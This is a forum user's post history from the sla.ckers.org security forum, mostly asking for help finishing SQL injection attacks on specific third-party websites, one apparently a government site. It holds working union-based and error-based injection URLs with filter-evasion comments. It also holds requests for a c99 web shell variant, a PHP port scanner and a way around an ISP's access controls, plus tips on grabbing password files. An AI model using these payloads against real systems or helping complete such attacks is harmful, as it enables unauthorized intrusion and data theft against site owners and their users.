Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
This group should mostly be dealing with how web applications enable networking security issues that are otherwise not there. Everything is being tunneled over port 80 now so what does that enable and how do we fix it? 

Current Page: 1 of 1
Results 1 - 16 of 16
3 years ago
thejack
hai all... can someone show me network scanner in .php ?? thats can be scan for opened port listing thanks for your help.
Forum: Networking
3 years ago
thejack
here i got bored to thingking.. Hi all.. i have ip dhcp from the server my ISP. IP : 20.200.200.201 subnet : 255.255.255.255 gateway: 20.200.200.201 and my isp network server was : 20.0.0.2 I want to run some application & just allow from 20.0.0.1-100 how can i change my ip or got access the application (phpmyadmin)
Forum: Networking
3 years ago
thejack
@saeedneamati : im NOT google dorker i only scan my target ;) , but sometimes i need to learn from other friend target. ofcorz using WEB Vul scanner you love it !! @lightos: great jobs brotha.. & thnks for nice script. i'll be more thanks with manual code injection... for my learning ~im not hax0r but im a security hobbiest~
Forum: SQL and Code Injection
3 years ago
thejack
this link was vuln SQL injection http://moj okertokab.go.id/mjk/src/detilartikel.php?&id=24' i found column has 10 http://moj okertokab.go.id/mjk/src/detilartikel.php?&id=24+and+1=0+union+select+1,2,3,4,5,6,7,8,9,10-- but i didn't find to find table_name your help is needed.. thanks
Forum: SQL and Code Injection
3 years ago
thejack
very cute... & use the tools... dont forget to buy this one havij pro ;)
Forum: SQL and Code Injection
3 years ago
thejack
try to find file: /password.properties thats heart of the site the password must be md5 encrypted
Forum: SQL and Code Injection
3 years ago
thejack
OK First thanks for your respond second this i share the link http://pastebin.com/bquLFi8T
Forum: SQL and Code Injection
3 years ago
thejack
still Not acceptable i try this: http://www.eb sfm.com/artikel.php?rubikID=21&artID=319/!*unioN*/%20/*!SeLECT*/%201,2,/*!table_name*/,4,5%20/*!from*/%20/*!InfoRmation_SCHEMa*/.%60tables%60%20/*!where*/%20/*!table_schema*/=/*!database%28%29*/%20/*
Forum: SQL and Code Injection
3 years ago
thejack
thanks blackrose , but still can't work thanks lightos. adding my knowlegde...
Forum: SQL and Code Injection
3 years ago
thejack
here script thats vuln: ( var id= ) ... <% id=cekal(trim(request.querystring("id"))) tp=cekal(trim(request.querystring("tp"))) if tp<>"" then %> <% end if set conn=server.createobject("adodb.connection") conn.open dbcon set rst = server.createobject("ADODB.recordset") rst.open "select * from news where id="
Forum: SQL and Code Injection
3 years ago
thejack
lightos Wrote: > Should be /*!group_concat(table_name)*/ still NOT ACCEPTABLE.. may i wrong with some string or methode?
Forum: SQL and Code Injection
3 years ago
thejack
someone can help me to finish this SQLi.. when inserting this code: http://www.target.com/artikel.php?rubikID=12&artID=4+union+/*!select*/+database(),1,2,3-- browser appear :target_db but if im insert this one: http://www.target.com/artikel.php?rubikID=21&artID=319/**//*!and*//**/1%3E2/**//*!union*//**//*!select*//**/1,2,/*group_concat(table_name)*/,4/**//*!from*//**//*!information_
Forum: SQL and Code Injection
4 years ago
thejack
where i get the variant of c99.php but file type in .cfm?? thanks all brothers. specialy for admin thanks u r the best.
Forum: SQL and Code Injection
4 years ago
thejack
please moderate my problem... for admin thanks brother..
Forum: SQL and Code Injection
4 years ago
thejack
detail SQLi like this: 1. /index.cfm?league=1%22+or+row(1,1)%3E(select+count(*),concat(@@version,0x3a,floor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1)--+1&tz=-8&original=1 2. /index.cfm?league=1%22+or+row(1,1)%3E(select+count(*),concat((Select+table_Name+from+information_schema.tables+limit+2,1),0x3a,floor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+li
Forum: SQL and Code Injection
4 years ago
thejack
Dear SLA.CKERS yesterday i found SQLi into ColdFusion .cfm i successed to get version/database/user of MySQL the WEB database, i use like this: http://www.target.com/index.cfm?league=1%22+or+row(1,1)%3E(select+count(*),concat(@@version,0x3a,floor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1)--+1&tz=-8&original=1 return: 5.1.34 i browse table by inserting Dark
Forum: SQL and Code Injection
Current Page: 1 of 1